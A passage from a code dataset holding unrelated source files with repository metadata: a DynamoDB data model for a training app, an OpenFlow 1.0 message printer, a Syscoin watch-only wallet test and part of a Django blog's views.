2022-03-12T01:03:22.000Z
|
LAB03/01-DDB/backend/cloudalbum/database/model_ddb.py
|
michaelrishiforrester/moving-to-serverless-renew
|
27cbcbde9db3d2bc66212fe4f768563d25f64c19
|
[
"MIT"
] | 4
|
2019-08-02T03:00:35.000Z
|
2020-02-26T18:44:03.000Z
|
"""
cloudalbum/database/model_ddb.py
~~~~~~~~~~~~~~~~~~~~~~~
Application data model defined here.
:description: CloudAlbum is a fully featured sample application for 'Moving to AWS serverless' training course
:copyright: © 2019 written by Dayoungle Jun, Sungshik Jou.
:license: MIT, see LICENSE for more details.
"""
import json
from datetime import datetime
from pynamodb.models import Model
from pynamodb.attributes import UnicodeAttribute, NumberAttribute, UTCDateTimeAttribute, ListAttribute, MapAttribute
from pynamodb.indexes import GlobalSecondaryIndex, IncludeProjection
from tzlocal import get_localzone
from boto3.session import Session
from os import environ
AWS_REGION = Session().region_name if environ.get('AWS_REGION') is None else environ.get('AWS_REGION')
class EmailIndex(GlobalSecondaryIndex):
"""
This class represents a global secondary index
"""
class Meta:
index_name = 'user-email-index'
read_capacity_units = 5
write_capacity_units = 5
projection = IncludeProjection(['password'])
# This attribute is the hash key for the index
# Note that this attribute must also exist
# in the model
email = UnicodeAttribute(hash_key=True)
class User(Model):
"""
User table for DynamoDB
"""
class Meta:
table_name = 'User'
region = AWS_REGION
id = UnicodeAttribute(hash_key=True)
email_index = EmailIndex()
email = UnicodeAttribute(null=False)
username = UnicodeAttribute(null=False)
password = UnicodeAttribute(null=False)
class Photo(Model):
"""
Photo table for DynamoDB
"""
class Meta:
table_name = 'Photo'
region = AWS_REGION
user_id = UnicodeAttribute(hash_key=True)
id = UnicodeAttribute(range_key=True)
tags = UnicodeAttribute(null=True)
desc = UnicodeAttribute(null=True)
filename_orig = UnicodeAttribute(null=True)
filename = UnicodeAttribute(null=True)
filesize = NumberAttribute(null=True)
geotag_lat = UnicodeAttribute(null=True)
geotag_lng = UnicodeAttribute(null=True)
upload_date = UTCDateTimeAttribute(default=datetime.now(get_localzone()))
taken_date = UTCDateTimeAttribute(null=True)
make = UnicodeAttribute(null=True)
model = UnicodeAttribute(null=True)
width = UnicodeAttribute(null=True)
height = UnicodeAttribute(null=True)
city = UnicodeAttribute(null=True)
nation = UnicodeAttribute(null=True)
address = UnicodeAttribute(null=True)
class ModelEncoder(json.JSONEncoder):
def default(self, obj):
if hasattr(obj, 'attribute_values'):
return obj.attribute_values
elif isinstance(obj, datetime):
return obj.isoformat()
return json.JSONEncoder.default(self, obj)
def photo_deserialize(photo):
photo_json = {}
photo_json['id'] = photo.id
photo_json['filename'] = photo.filename
photo_json['filename_orig'] = photo.filename_orig
photo_json['filesize'] = photo.filesize
photo_json['upload_date'] = photo.upload_date
photo_json['tags'] = photo.tags
photo_json['desc'] = photo.desc
photo_json['geotag_lat'] = photo.geotag_lat
photo_json['geotag_lng'] = photo.geotag_lng
photo_json['taken_date'] = photo.taken_date
photo_json['make'] = photo.make
photo_json['model'] = photo.model
photo_json['width'] = photo.width
photo_json['height'] = photo.height
photo_json['city'] = photo.city
photo_json['nation'] = photo.nation
photo_json['address'] = photo.address
return photo_json
| 30.700855
| 116
| 0.703786
|
9a958049a294a8b4708c3b62711abc41e4d1d30d
| 22,879
|
py
|
Python
|
of10/prints.py
|
palco003/ofp_sniffer
|
5b45db14187aae6adf7b1db96e36457703e2f884
|
[
"Apache-2.0"
] | null | null | null |
of10/prints.py
|
palco003/ofp_sniffer
|
5b45db14187aae6adf7b1db96e36457703e2f884
|
[
"Apache-2.0"
] | null | null | null |
of10/prints.py
|
palco003/ofp_sniffer
|
5b45db14187aae6adf7b1db96e36457703e2f884
|
[
"Apache-2.0"
] | null | null | null |
"""
Prints for OpenFlow 1.0 only
"""
from hexdump import hexdump
import of10.dissector
import of10.parser
import tcpiplib.prints
import tcpiplib.tcpip
from gen.prints import red, green
from tcpiplib.prints import eth_addr, datapath_id
import tcpiplib.prints
import gen.cli
def print_type_unknown(pkt):
string = 'OpenFlow OFP_Type %s unknown \n'
print string % (pkt.of_h['type'])
def print_pad(pad):
"""
Used to print pads as a sequence of 0s: 0, 00, 000..
Args:
pad: pad in str format
Returns: string with '0'
"""
pad_len = len(pad)
string = '0'
if pad_len == 1:
return '0'
for item in range(0,pad_len-1):
string += '0'
return string
def print_of_hello(msg):
print 'OpenFlow Hello'
def print_of_error(msg):
nCode, tCode = of10.dissector.get_ofp_error(msg.type, msg.code)
print ('OpenFlow Error - Type: %s Code: %s' % (red(nCode), red(tCode)))
hexdump(msg.data)
def print_of_feature_req(msg):
print 'OpenFlow Feature Request'
def print_of_getconfig_req(msg):
print 'OpenFlow GetConfig Request'
def print_of_feature_res(msg):
dpid = datapath_id(msg.datapath_id)
print ('FeatureRes - datapath_id: %s n_buffers: %s n_tbls: %s, pad: %s'
% (green(dpid), msg.n_buffers, msg.n_tbls, print_pad(msg.pad)))
print ('FeatureRes - Capabilities:'),
for i in msg.capabilities:
print of10.dissector.get_feature_res_capabilities(i),
print
print ('FeatureRes - Actions:'),
for i in msg.actions:
print of10.dissector.get_feature_res_actions(i),
print
print_of_ports(msg.ports)
def _dont_print_0(printed):
if printed is False:
print '0',
return False
def print_port_field(port_id, variable, name):
port_id = '%s' % green(port_id)
printed = False
print ('Port_id: %s - %s:' % (port_id, name)),
for i in variable:
print of10.dissector.get_phy_feature(i),
printed = True
else:
printed = _dont_print_0(printed)
print
def print_ofp_phy_port(port):
port_id = '%s' % green(port.port_id)
print ('Port_id: %s - hw_addr: %s name: %s' % (
port_id, green(port.hw_addr), green(port.name)))
print ('Port_id: %s - config:' % port_id),
printed = False
for i in port.config:
print of10.dissector.get_phy_config(i),
printed = True
else:
printed = _dont_print_0(printed)
print
print ('Port_id: %s - state:' % port_id),
for i in port.state:
print of10.dissector.get_phy_state(i),
printed = True
else:
printed = _dont_print_0(printed)
print
# TODO: fix it
print_port_field(port_id, port.curr, 'curr')
print_port_field(port_id, port.advertised, 'advertised')
print_port_field(port_id, port.supported, 'supported')
print_port_field(port_id, port.peer, 'peer')
def print_of_ports(ports):
if type(ports) is not list:
print_ofp_phy_port(ports)
else:
for port in ports:
print_ofp_phy_port(port)
def print_ofp_match(match):
print 'Match -',
# Collect all variables from class ofp_match
# print those that are not 'None'
for match_item in match.__dict__:
match_item_value = match.__dict__[match_item]
if match_item_value is not None:
if match_item is 'dl_vlan':
match_item_value = of10.dissector.get_vlan(match_item_value)
elif match_item is 'wildcards':
match_item_value = hex(match_item_value)
elif match_item is 'dl_type':
match_item_value = tcpiplib.tcpip.get_ethertype(match_item_value)
print ("%s: %s" % (match_item, green(match_item_value))),
print
def print_ofp_body(msg):
string = ('Body - Cookie: %s Command: %s Idle/Hard Timeouts: '
'%s/%s\nBody - Priority: %s Buffer ID: %s Out Port: %s Flags: %s')
command = green(of10.dissector.get_ofp_command(msg.command))
flags = green(of10.dissector.get_ofp_flags(msg.flags))
out_port = green(of10.dissector.get_phy_port_id(msg.out_port))
print string % (msg.cookie, command, msg.idle_timeout, msg.hard_timeout,
green(msg.priority), msg.buffer_id, out_port, flags)
def print_ofp_flow_removed(msg):
print_ofp_match(msg.match)
string = ('Body - Cookie: %s Priority: %s Reason: %s Pad: %s\nBody - '
'Duration Secs/NSecs: %s/%s Idle Timeout: %s Pad2/Pad3: %s/%s'
' Packet Count: %s Byte Count: %s')
print string % (msg.cookie, msg.priority, red(msg.reason),
print_pad(msg.pad), msg.duration_sec, msg.duration_nsec,
msg.idle_timeout, print_pad(msg.pad2),
print_pad(msg.pad3), msg.packet_count, msg.byte_count)
def print_actions(actions):
for action in actions:
print_ofp_action(action.type, action.length, action.payload)
def print_ofp_action(action_type, length, payload):
if action_type == 0:
port, max_len = of10.parser.get_action(action_type, payload)
port = of10.dissector.get_phy_port_id(port)
print ('Action - Type: %s Length: %s Port: %s '
'Max Length: %s' %
(green('OUTPUT'), length, green(port), max_len))
return 'output:' + port
elif action_type == 1:
vlan, pad = of10.parser.get_action(action_type, payload)
print ('Action - Type: %s Length: %s VLAN ID: %s Pad: %s' %
(green('SetVLANID'), length, green(str(vlan)), print_pad(pad)))
return 'mod_vlan_vid:' + str(vlan)
elif action_type == 2:
vlan_pc, pad = of10.parser.get_action(action_type, payload)
print ('Action - Type: %s Length: %s VLAN PCP: %s Pad: %s' %
(green('SetVLANPCP'), length, green(str(vlan_pc)), print_pad(pad)))
return 'mod_vlan_pcp:' + str(vlan_pc)
elif action_type == 3:
print ('Action - Type: %s Length: %s' %
(green('StripVLAN'), length))
return 'strip_vlan'
elif action_type == 4:
setDLSrc, pad = of10.parser.get_action(action_type, payload)
print ('Action - Type: %s Length: %s SetDLSrc: %s Pad: %s' %
(green('SetDLSrc'), length, green(str(eth_addr(setDLSrc))),
print_pad(pad)))
return 'mod_dl_src:' + str(eth_addr(setDLSrc))
elif action_type == 5:
setDLDst, pad = of10.parser.get_action(action_type, payload)
print ('Action - Type: %s Length: %s SetDLDst: %s Pad: %s' %
(green('SetDLDst'), length, green(str(eth_addr(setDLDst))),
print_pad(pad)))
return 'mod_dl_dst:' + str(eth_addr(setDLDst))
elif action_type == 6:
nw_addr = of10.parser.get_action(action_type, payload)
print ('Action - Type: %s Length: %s SetNWSrc: %s' %
(green('SetNWSrc'), length, green(str(nw_addr))))
return 'mod_nw_src:' + str(nw_addr)
elif action_type == 7:
nw_addr = of10.parser.get_action(action_type, payload)
print ('Action - Type: %s Length: %s SetNWDst: %s' %
(green('SetNWDst'), length, green(str(nw_addr))))
return 'mod_nw_src:' + str(nw_addr)
elif action_type == 8:
nw_tos, pad = of10.parser.get_action(action_type, payload)
print ('Action - Type: %s Length: %s SetNWTos: %s Pad: %s' %
(green('SetNWTos'), length, green(str(nw_tos)), print_pad(pad)))
return 'mod_nw_tos:' + str(nw_tos)
elif action_type == 9:
port, pad = of10.parser.get_action(action_type, payload)
print ('Action - Type: %s Length: %s SetTPSrc: %s Pad: %s' %
(green('SetTPSrc'), length, green(str(port)), print_pad(pad)))
return 'mod_tp_src:' + str(port)
elif action_type == int('a', 16):
port, pad = of10.parser.get_action(action_type, payload)
print ('Action - Type: %s Length: %s SetTPDst: %s Pad: %s' %
(green('SetTPDst'), length, green(str(port)), print_pad(pad)))
return 'mod_tp_dst:' + str(port)
elif action_type == int('b', 16):
port, pad, queue_id = of10.parser.get_action(action_type, payload)
print (('Action - Type: %s Length: %s Enqueue: %s Pad: %s'
' Queue: %s') %
(green('Enqueue'), length, green(str(port)), print_pad(pad),
green(str(queue_id))))
return 'set_queue:' + str(queue_id)
elif action_type == int('ffff', 16):
vendor = of10.parser.get_action(action_type, payload)
print ('Action - Type: %s Length: %s Vendor: %s' %
(green('VENDOR'), length, green(str(vendor))))
return 'VendorType'
else:
return 'Error'
def get_command(command):
commands = {0: 'add-flow', 1: 'mod-flows', 3: 'del-flows'}
try:
return commands[command]
except KeyError:
return 0
def get_flag(flag):
flags = {0: '', 1: 'send_flow_rem', 2: 'check_overlap', 3: 'Emerg'}
try:
return flags[flag]
except KeyError:
return 0
def get_actions(action_type, action_length, payload):
if action_type == 0:
port, max_len = of10.parser.get_action(action_type, payload)
return 'output:%s' % (port if port != 65533 else 'CONTROLLER')
elif action_type == 1:
vlan, pad = of10.parser.get_action(action_type, payload)
return 'mod_vlan_vid:' + str(vlan)
elif action_type == 2:
vlan_pc, pad = of10.parser.get_action(action_type, payload)
return 'mod_vlan_pcp:' + str(vlan_pc)
elif action_type == 3:
return 'strip_vlan'
elif action_type == 4:
setDLSrc, pad = of10.parser.get_action(action_type, payload)
return 'mod_dl_src:' + str(eth_addr(setDLSrc))
elif action_type == 5:
setDLDst, pad = of10.parser.get_action(action_type, payload)
return 'mod_dl_dst:' + str(eth_addr(setDLDst))
elif action_type == 6:
nw_addr = of10.parser.get_action(action_type, payload)
return 'mod_nw_src:' + str(nw_addr)
elif action_type == 7:
nw_addr = of10.parser.get_action(action_type, payload)
return 'mod_nw_src:' + str(nw_addr)
elif action_type == 8:
nw_tos, pad = of10.parser.get_action(action_type, payload)
return 'mod_nw_tos:' + str(nw_tos)
elif action_type == 9:
port, pad = of10.parser.get_action(action_type, payload)
return 'mod_tp_src:' + str(port)
elif action_type == int('a', 16):
port, pad = of10.parser.get_action(action_type, payload)
return 'mod_tp_dst:' + str(port)
elif action_type == int('b', 16):
port, pad, queue_id = of10.parser.get_action(action_type, payload)
return 'set_queue:' + str(queue_id)
def print_ofp_ovs(msg):
'''
If -o or --print-ovs is provided by user, print a ovs-ofctl add-dump
'''
if gen.cli.print_ovs is not True:
return
switch_ip = 'SWITCH_IP'
switch_port = '6634'
ofm = []
ofactions = []
ovs_command = get_command(msg.command)
for K in msg.match.__dict__:
if K != 'wildcards':
if msg.match.__dict__[K] is not None:
value = "%s=%s," % (K, msg.match.__dict__[K])
ofm.append(value)
matches = ''.join(ofm)
if msg.command is not 3:
for action in msg.actions:
value = get_actions(action.type, action.length, action.payload)
value = "%s," % (value)
ofactions.append(value)
flag = get_flag(msg.flags)
print('ovs-ofctl %s tcp:%s:%s \"' % (ovs_command, switch_ip, switch_port)),
if msg.flags != 0:
print('%s,' % flag),
if msg.priority != 32678:
print('priority=%s,' % msg.priority),
if msg.idle_timeout != 0:
print('idle_timeout=%s,' % msg.idle_timeout),
if msg.hard_timeout != 0:
print('hard_timeout=%s,' % msg.hard_timeout),
print('%s ' % matches),
print('action=%s\"' % ''.join(ofactions))
else:
ovs_msg_del = 'ovs-ofctl %s tcp:%s:%s %s '
print(ovs_msg_del % (ovs_command, switch_ip, switch_port, matches))
def print_of_FlowMod(msg):
print_ofp_match(msg.match)
print_ofp_body(msg)
print_actions(msg.actions)
print_ofp_ovs(msg)
def _print_portMod_config_mask(variable, name):
print ('PortMod %s:' % name),
printed = False
for i in variable:
print of10.dissector.get_phy_config(i),
printed = True
else:
printed = _dont_print_0(printed)
print
def print_of_PortMod(msg):
print ('PortMod Port_no: %s HW_Addr %s Pad: %s' %
(msg.port_no, eth_addr(msg.hw_addr), print_pad(msg.pad)))
_print_portMod_config_mask(msg.config, 'config')
_print_portMod_config_mask(msg.mask, 'mask')
_print_portMod_config_mask(msg.advertise, 'advertise')
def print_of_BarrierReq(msg):
print 'OpenFlow Barrier Request'
def print_of_BarrierReply(msg):
print 'OpenFlow Barrier Reply'
def print_of_vendor(msg):
vendor = of10.dissector.get_ofp_vendor(msg.vendor)
print ('OpenFlow Vendor: %s' % vendor)
def print_ofp_statReq(msg):
if msg.stat_type == 0:
print_ofp_statReqDesc(msg)
elif msg.stat_type == 1 or msg.type == 2:
print_ofp_statReqFlowAggregate(msg)
elif msg.stat_type == 3:
print_ofp_statReqTable(msg)
elif msg.stat_type == 4:
print_ofp_statReqPort(msg)
elif msg.stat_type == 5:
print_ofp_statReqQueue(msg)
elif msg.stat_type == 65535:
print_ofp_statReqVendor(msg)
def print_ofp_statReqDesc(msg):
print 'StatReq Type: Description(%s)' % msg.stat_type
def print_ofp_statReqFlowAggregate(msg):
if msg.stat_type == 1:
type_name = 'Flow'
else:
type_name = 'Aggregate'
print ('StatReq Type: %s(%s)' % (type_name, msg.stat_type))
print_ofp_match(msg.stats.match)
out_port = of10.dissector.get_phy_port_id(msg.stats.out_port)
print ('StatReq Table_id: %s Pad: %s Out_Port: %s' % (msg.stats.table_id,
print_pad(msg.stats.pad), out_port))
def print_ofp_statReqTable(msg):
print 'StatReq Type: Table(%s)' % msg.stat_type
def print_ofp_statReqPort(msg):
port_number = of10.dissector.get_phy_port_id(msg.stats.port_number)
print ('StatReq Type: Port(%s): Port_Number: %s Pad: %s' %
(msg.stat_type, green(port_number), print_pad(msg.stats.pad)))
def print_ofp_statReqQueue(msg):
port_number = of10.dissector.get_phy_port_id(msg.stats.port_number)
print ('StatReq Type: Queue(%s): Port_Number: %s Pad: %s Queue_id: %s' %
(msg.stat_type, green(port_number), print_pad(msg.stats.pad),
msg.stats.queue_id))
def print_ofp_statReqVendor(msg):
vendor = of10.dissector.get_ofp_vendor(msg.stats.vendor_id)
print ('StatReq Type: Vendor(%s): Vendor_ID: %s' % (msg.stat_type,
vendor))
def print_ofp_statRes(msg):
if msg.stat_type == 0:
print_ofp_statResDesc(msg)
elif msg.stat_type == 1:
print_ofp_statResFlowArray(msg)
elif msg.stat_type == 2:
print_ofp_statResAggregate(msg)
elif msg.stat_type == 3:
print_ofp_statResTableArray(msg)
elif msg.stat_type == 4:
print_ofp_statResPortArray(msg)
elif msg.stat_type == 5:
print_ofp_statResQueueArray(msg)
elif msg.stat_type == 65535:
print_ofp_statResVendor(msg)
def print_ofp_statResDesc(msg):
print ('StatRes Type: Description(%s)' % (msg.stat_type))
print ('StatRes mfr_desc: %s' % (msg.stats.mfr_desc))
print ('StatRes hw_desc: %s' % (msg.stats.hw_desc))
print ('StatRes sw_desc: %s' % (msg.stats.sw_desc))
print ('StatRes serial_num: %s' % (msg.stats.serial_num))
print ('StatRes dp_desc: %s' % (msg.stats.dp_desc))
def print_ofp_statResFlowArray(msg):
if len(msg.stats.flows) == 0:
print ('StatRes Type: Flow(1)\nNo Flows')
return
for flow in msg.stats.flows:
print_ofp_statResFlow(flow)
def print_ofp_statResFlow(flow):
print ('StatRes Type: Flow(1)')
print ('StatRes Length: %s Table_id: %s Pad: %s ' %
(flow.length, flow.table_id, print_pad(flow.pad)))
print ('StatRes'),
print_ofp_match(flow.match)
print ('StatRes duration_sec: %s, duration_nsec: %s, priority: %s,'
' idle_timeout: %s, hard_timeout: %s, pad: %s, cookie: %s,'
' packet_count: %s, byte_count: %s' %
(flow.duration_sec, flow.duration_nsec,
flow.priority, flow.idle_timeout,
flow.hard_timeout, print_pad(flow.pad),
flow.cookie,
flow.packet_count, flow.byte_count))
print ('StatRes'),
print_actions(flow.actions)
def print_ofp_statResAggregate(msg):
print ('StatRes Type: Aggregate(2)')
print ('StatRes packet_count: %s, byte_count: %s flow_count: %s '
'pad: %s' %
(msg.stats.packet_count, msg.stats.byte_count,
msg.stats.flow_count, print_pad(msg.stats.pad)))
def print_ofp_statResTableArray(msg):
if len(msg.stats.tables) == 0:
print ('StatRes Type: Table(3)\nNo Tables')
return
print ('StatRes Type: Table(3)')
for table in msg.stats.tables:
print_ofp_statResTable(table)
def print_ofp_statResTable(table):
print ('StatRes table_id: %s, pad: %s, name: "%s", wildcards: %s, '
'max_entries: %s, active_count: %s, lookup_count: %s, '
'matched_count: %s' %
(table.table_id, print_pad(table.pad), table.name, hex(table.wildcards),
table.max_entries, table.active_count,
table.lookup_count, table.matched_count))
def print_ofp_statResPortArray(msg):
if len(msg.stats.ports) == 0:
print ('StatRes Type: Port(4)\nNo Ports')
return
for port in msg.stats.ports:
print_ofp_statResPort(port)
def print_ofp_statResPort(port):
print ('StatRes Type: Port(4)')
print ('StatRes port_number: %s rx_packets: %s rx_bytes: %s rx_errors: %s'
' rx_crc_err: %s rx_dropped: %s rx_over_err: %s rx_frame_err: %s\n'
'StatRes port_number: %s tx_packets: %s tx_bytes: %s tx_errors: %s'
' tx_dropped: %s collisions: %s pad: %s' %
(red(port.port_number), port.rx_packets,
port.rx_bytes, port.rx_errors, port.rx_crc_err,
port.rx_dropped, port.rx_over_err,
port.rx_frame_err, red(port.port_number),
port.tx_packets, port.tx_bytes, port.tx_errors,
port.tx_dropped, port.collisions, print_pad(port.pad)))
def print_ofp_statResQueueArray(msg):
if len(msg.stats.queues) == 0:
print 'StatRes Type: Queue(5)\nNo Queues'
return
for queue in msg.queues:
print_ofp_statResQueue(queue)
def print_ofp_statResQueue(queue):
print 'StatRes Type: Queue(5)'
print ('StatRes queue_id: %s length: %s pad: %s'
' tx_bytes: %s tx_packets: %s tx_errors: %s' %
(queue.queue_id, queue.length, print_pad(queue.pad),
queue.tx_bytes, queue.tx_packets, queue.tx_errors))
def print_ofp_statResVendor(msg):
print ('StatRes Type: Vendor(%s)' % (hex(65535)))
print ('StatRes vendor_id: %s' % (msg.stats.vendor_id))
print_ofp_statResVendorData(msg.stats.data)
def print_ofp_statResVendorData(data):
print ('StatRes Vendor Data: ')
hexdump(data)
def print_ofp_getConfigRes(msg):
print ('OpenFlow GetConfigRes - Flag: %s Miss_send_len: %s' %
(msg.flags, msg.miss_send_len))
def print_ofp_setConfig(msg):
print ('OpenFlow SetConfig - Flag: %s Miss_send_len: %s' %
(msg.flags, msg.miss_send_len))
def print_of_echoreq(msg):
print 'OpenFlow Echo Request'
def print_of_echores(msg):
print 'OpenFlow Echo Reply'
def print_portStatus(msg):
print ('OpenFlow PortStatus - Reason: %s Pad: %s' % (msg.reason,
print_pad(msg.pad)))
print_of_ports(msg.desc)
def print_packetInOut_layer2(of_xid, eth):
print ('%s' % of_xid),
tcpiplib.prints.print_layer2(eth)
def print_packetInOut_vlan(of_xid, vlan):
print ('%s Ethernet:' % of_xid),
tcpiplib.prints.print_vlan(vlan)
def print_of_packetIn(msg):
print ('PacketIn: buffer_id: %s total_len: %s in_port: %s reason: %s '
'pad: %s' %
(hex(msg.buffer_id), msg.total_len, green(msg.in_port),
green(msg.reason), print_pad(msg.pad)))
print_data(msg.data)
def print_of_packetOut(msg):
print ('PacketOut: buffer_id: %s in_port: %s actions_len: %s' %
(hex(msg.buffer_id),
green(of10.dissector.get_phy_port_id(msg.in_port)),
msg.actions_len))
if msg.actions_len is not 0:
print_actions(msg.actions)
print_data(msg.data)
def print_data(data):
"""
Print msg.data from both PacketIn and Packetout
Args:
data: msg.data - array of protocols
"""
next_protocol = '0x0000'
eth = data.pop(0)
tcpiplib.prints.print_layer2(eth)
next_protocol = eth.protocol
if next_protocol in [33024]:
vlan = data.pop(0)
tcpiplib.prints.print_vlan(vlan)
next_protocol = vlan.protocol
if next_protocol in [35020, 35138]:
lldp = data.pop(0)
tcpiplib.prints.print_lldp(lldp)
elif next_protocol in [34998]:
print 'OESS FVD'
elif next_protocol in [2048]:
ip = data.pop(0)
tcpiplib.prints.print_layer3(ip)
if ip.protocol is 6:
tcp = data.pop(0)
tcpiplib.prints.print_tcp(tcp)
elif next_protocol in [2054]:
arp = data.pop(0)
tcpiplib.prints.print_arp(arp)
def print_queueReq(msg):
print ('QueueGetConfigReq Port: %s Pad: %s' %
(msg.port, print_pad(msg.pad)))
def print_queueRes(msg):
print ('QueueGetConfigRes Port: %s Pad: %s' %
(msg.port, print_pad(msg.pad)))
if len(msg.queues) == 0:
print 'QueueGetConfigRes: No Queues'
return
for queue in msg.queues:
print_queueRes_queue(queue)
def print_queueRes_queue(queue):
print ('Queue_ID: %s Length: %s Pad: %s' %
(queue.queue_id, queue.length, print_pad(queue.pad)))
if len(queue.properties) == 0:
print 'QueueGetConfigRes: No Properties'
return
for property in queue.properties:
print_queueRes_properties(property)
def print_queueRes_properties(qproperty):
print ('Property: %s Length: %s Pad: %s' %
(qproperty.property, qproperty.length, print_pad(qproperty.pad)))
print_queueRes_prop_payload(qproperty.payload)
def print_queueRes_prop_payload(payload):
print ('Payload: Rate %s Pad: %s' %
(payload.rate, print_pad(payload.pad)))
| 32.452482
| 83
| 0.626164
|
860c7417dc432bdcf0dfe98079bb13d8e1db9f48
| 4,805
|
py
|
Python
|
test/functional/wallet_watchonly.py
|
Frank-GER/syscoin
|
efbdac67f9d3d37d75de3480b8bb2c539ad05dd4
|
[
"MIT"
] | 61
|
2016-03-09T10:42:05.000Z
|
2018-03-13T05:06:30.000Z
|
test/functional/wallet_watchonly.py
|
Frank-GER/syscoin
|
efbdac67f9d3d37d75de3480b8bb2c539ad05dd4
|
[
"MIT"
] | 153
|
2016-02-29T17:45:10.000Z
|
2018-03-16T23:37:02.000Z
|
test/functional/wallet_watchonly.py
|
Frank-GER/syscoin
|
efbdac67f9d3d37d75de3480b8bb2c539ad05dd4
|
[
"MIT"
] | 18
|
2016-03-02T21:50:44.000Z
|
2018-03-07T20:36:12.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2018-2021 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test createwallet watchonly arguments.
"""
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error
)
class CreateWalletWatchonlyTest(SyscoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
node = self.nodes[0]
self.nodes[0].createwallet(wallet_name='default')
def_wallet = node.get_wallet_rpc('default')
a1 = def_wallet.getnewaddress()
wo_change = def_wallet.getnewaddress()
wo_addr = def_wallet.getnewaddress()
self.nodes[0].createwallet(wallet_name='wo', disable_private_keys=True)
wo_wallet = node.get_wallet_rpc('wo')
wo_wallet.importpubkey(pubkey=def_wallet.getaddressinfo(wo_addr)['pubkey'])
wo_wallet.importpubkey(pubkey=def_wallet.getaddressinfo(wo_change)['pubkey'])
# generate some btc for testing
self.generatetoaddress(node, COINBASE_MATURITY + 1, a1)
# send 1 sys to our watch-only address
txid = def_wallet.sendtoaddress(wo_addr, 1)
self.generate(self.nodes[0], 1, sync_fun=self.no_op)
# getbalance
self.log.info('include_watchonly should default to true for watch-only wallets')
self.log.info('Testing getbalance watch-only defaults')
assert_equal(wo_wallet.getbalance(), 1)
assert_equal(len(wo_wallet.listtransactions()), 1)
assert_equal(wo_wallet.getbalance(include_watchonly=False), 0)
self.log.info('Test sending from a watch-only wallet raises RPC error')
msg = "Error: Private keys are disabled for this wallet"
assert_raises_rpc_error(-4, msg, wo_wallet.sendtoaddress, a1, 0.1)
assert_raises_rpc_error(-4, msg, wo_wallet.sendmany, amounts={a1: 0.1})
self.log.info('Testing listreceivedbyaddress watch-only defaults')
result = wo_wallet.listreceivedbyaddress()
assert_equal(len(result), 1)
assert_equal(result[0]["involvesWatchonly"], True)
result = wo_wallet.listreceivedbyaddress(include_watchonly=False)
assert_equal(len(result), 0)
self.log.info('Testing listreceivedbylabel watch-only defaults')
result = wo_wallet.listreceivedbylabel()
assert_equal(len(result), 1)
assert_equal(result[0]["involvesWatchonly"], True)
result = wo_wallet.listreceivedbylabel(include_watchonly=False)
assert_equal(len(result), 0)
self.log.info('Testing listtransactions watch-only defaults')
result = wo_wallet.listtransactions()
assert_equal(len(result), 1)
assert_equal(result[0]["involvesWatchonly"], True)
result = wo_wallet.listtransactions(include_watchonly=False)
assert_equal(len(result), 0)
self.log.info('Testing listsinceblock watch-only defaults')
result = wo_wallet.listsinceblock()
assert_equal(len(result["transactions"]), 1)
assert_equal(result["transactions"][0]["involvesWatchonly"], True)
result = wo_wallet.listsinceblock(include_watchonly=False)
assert_equal(len(result["transactions"]), 0)
self.log.info('Testing gettransaction watch-only defaults')
result = wo_wallet.gettransaction(txid)
assert_equal(result["details"][0]["involvesWatchonly"], True)
result = wo_wallet.gettransaction(txid=txid, include_watchonly=False)
assert_equal(len(result["details"]), 0)
self.log.info('Testing walletcreatefundedpsbt watch-only defaults')
inputs = []
outputs = [{a1: 0.5}]
options = {'changeAddress': wo_change}
no_wo_options = {'changeAddress': wo_change, 'includeWatching': False}
result = wo_wallet.walletcreatefundedpsbt(inputs=inputs, outputs=outputs, options=options)
assert_equal("psbt" in result, True)
assert_raises_rpc_error(-4, "Insufficient funds", wo_wallet.walletcreatefundedpsbt, inputs, outputs, 0, no_wo_options)
self.log.info('Testing fundrawtransaction watch-only defaults')
rawtx = wo_wallet.createrawtransaction(inputs=inputs, outputs=outputs)
result = wo_wallet.fundrawtransaction(hexstring=rawtx, options=options)
assert_equal("hex" in result, True)
assert_raises_rpc_error(-4, "Insufficient funds", wo_wallet.fundrawtransaction, rawtx, no_wo_options)
if __name__ == '__main__':
CreateWalletWatchonlyTest().main()
| 42.901786
| 126
| 0.706556
|
26a16e0c8052a80bf622ebec0c3fe1511e108b00
| 2,853
|
py
|
Python
|
blog/views.py
|
javadebadi/django-blog
|
2dd3926158def8463385c0b554a623563888711d
|
[
"MIT"
] | null | null | null |
blog/views.py
|
javadebadi/django-blog
|
2dd3926158def8463385c0b554a623563888711d
|
[
"MIT"
] | null | null | null |
blog/views.py
|
javadebadi/django-blog
|
2dd3926158def8463385c0b554a623563888711d
|
[
"MIT"
] | null | null | null |
from django.http import HttpResponse
from django.shortcuts import render
from blog.models import (
Post,
ContactMessage,
)
from django.shortcuts import get_object_or_404
from blog.logic import BlogTokenize
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from blog.forms import ContactMessageForm
from django.core.mail import EmailMessage
# Create your views here.
def home(request):
posts = Post.objects.all()[:2]
return render(request, 'blog/index.html', context={'posts':posts})
def about(request):
return render(request, 'blog/about.html', context={})
def contact(request):
if request.method == 'POST':
form = ContactMessageForm(request.POST)
if form.is_valid():
print(" =============== Clean Data =================")
print(form.cleaned_data)
ContactMessage.objects.create(
name=form.cleaned_data.get("name"),
email=form.cleaned_data.get("email"),
message=form.cleaned_data.get("message"),
phone_number=form.cleaned_data.get("phone_number"),
)
# send email
email = EmailMessage(
'[Javad Blog]: Automatic Django Email', # subject
f"""
----------------------------------------------
Sender Email: {form.cleaned_data.get("email")}
----------------------------------------------
{form.cleaned_data.get("message")}
""", # body of the email
'javad.ebadi.1990.smtp@gmail.com', # sender
[
'javad.ebadi.1990.smtp@gmail.com',
'javad.ebadi.1990@gmail.com',
],
)
email.send()
return render(request, 'blog/thanks.html', context={})
else:
return HttpResponse('<p>Invalid Data</p>')
if request.method == 'GET':
form = ContactMessageForm()
return render(request, 'blog/contact.html', context={'form': form})
def post_list(request, tag_name=None):
if tag_name is None:
all_posts = Post.objects.all()
else:
all_posts = Post.objects.filter(tags__name__iexact=tag_name)
paginator = Paginator(all_posts, 3)
page_number = request.GET.get("page")
try:
page = paginator.page(page_number)
